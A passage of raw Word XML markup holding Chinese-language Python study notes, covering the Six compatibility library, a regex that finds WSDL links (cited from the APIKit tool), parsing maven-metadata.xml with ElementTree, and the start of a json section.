      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分裂的问题</w:t>
      </w:r>
      <w:bookmarkEnd w:id="502"/>
    </w:p>
    <w:p w14:paraId="72163BAA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Six</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有托管在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Github</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上，而是托管在了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Bitbucket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FBDB19" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E112F1E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>众所周知</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本的分裂给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开发者们带来了很大的烦恼，为了使代码同时兼容两个版本，往往要增加大量的代码。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>于是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Six </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出现了。正如它的介绍所说，它是一个专门用来兼容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的库。它解决了诸如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> urllib </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的部分方法不兼容，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> str </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> bytes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型不兼容等“知名”问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64494DFD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B41D6AC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57D576AD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33369DCB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51505182" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1153BD20" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="548B2062" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78662C6F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="503" w:name="_Toc159779943"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>re</w:t>
      </w:r>
      <w:bookmarkEnd w:id="503"/>
    </w:p>
    <w:p w14:paraId="02C3A08E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考案例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: APIKit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>识别</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的功能复刻</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F30F60" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78A19AA9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>reg_exp = re.compile(r"""href="([^"]*\?wsdl)"&gt;""")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB72C7E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>reg_res = reg_exp.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>search(rsp.text)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if reg_res != None:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    wsdl_url = reg_res.group(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1032DB95" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A1E95A2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不区分大小写匹配：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>re.IGNORECASE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525F2BA9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Eg: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">reg_exp = re.compile(r"""href="([^"]*\?wsdl)"&gt;""", </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>re.IGNORECASE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281ADAFF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="295031FE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="049AB073" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D6FD0B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="504" w:name="_Toc159779944"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:bookmarkEnd w:id="504"/>
    </w:p>
    <w:p w14:paraId="05A6EB61" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FA0951E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>import xml.etree.ElementTree as ET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E859888" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66398454" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    def meta_xml(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47966C26" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        meta_xml_path = self._url + self.path + "maven-metadata.xml"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BFBB47" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        res = session.get(meta_xml_path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06808BF5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>root = ET.fromstring(res.text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C85DE8B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        meta_xml_list = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B7383E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>for child in root:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF54969" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>if child.tag == 'groupId':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060E2567" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">                pom_xml_group_id = child.text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BD953E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            if child.tag == 'artifactId':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F134788" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                pom_xml_artifact_id = child.text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AC2EB5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            if child.tag == 'versioning':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5588AACC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                for child_versions in child:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770D342A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    if child_versions.tag == 'versions':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50972A37" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                        for child_version in child_versions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523B5CAA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                            pom_xml_data = defaultdict(lambda: None)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5EDA0C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                            pom_xml_data['repository'] = 'central'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DFD49A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                            pom_xml_data['classifier'] = 'maven'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEBF469" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                            pom_xml_data['group_id'] = pom_xml_group_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730C192A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                            pom_xml_data['artifact_id'] = pom_xml_artifact_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322E42DD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                            pom_xml_data['version'] = child_version.text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C7F3A0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                            pom_xml_data['purl'] = self.get_purl("maven", pom_xml_data['group_id'],pom_xml_data['artifact_id'], pom_xml_data['version'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DA04B7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                            meta_xml_list.append(pom_xml_data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF38DCF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        # xml_path != [] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说明从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> maven-metadata.xml </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中匹配到了值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60943A47" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        if meta_xml_list != []:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318CAE34" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            for single_pom_xml_data in meta_xml_list:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D03D6C1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1752B076" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    self.save_jar_2_components_pom_xml(single_pom_xml_data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A486C91" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                except Exception as err:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2779DE61" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    print(str(err))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0954F1B4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AC93E4A" w14:textId="79AC5788" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="505" w:name="_Toc159779945"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:bookmarkEnd w:id="505"/>
    </w:p>
    <w:p w14:paraId="63A6E6BA" w14:textId="34CE502C" w:rsidR="006510CF" w:rsidRPr="006510CF" w:rsidRDefault="006510CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00393565">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>导入为</w:t>
      </w:r>
      <w:r w:rsidRPr="00393565">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r w:rsidRPr="00393565">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00393565">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>dict</w:t>
      </w:r>
      <w:r w:rsidRPr="00393565">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>数据类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356763B1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>json.load(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>句柄</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6849BA" w14:textId="69E682F2" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>json.loads(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
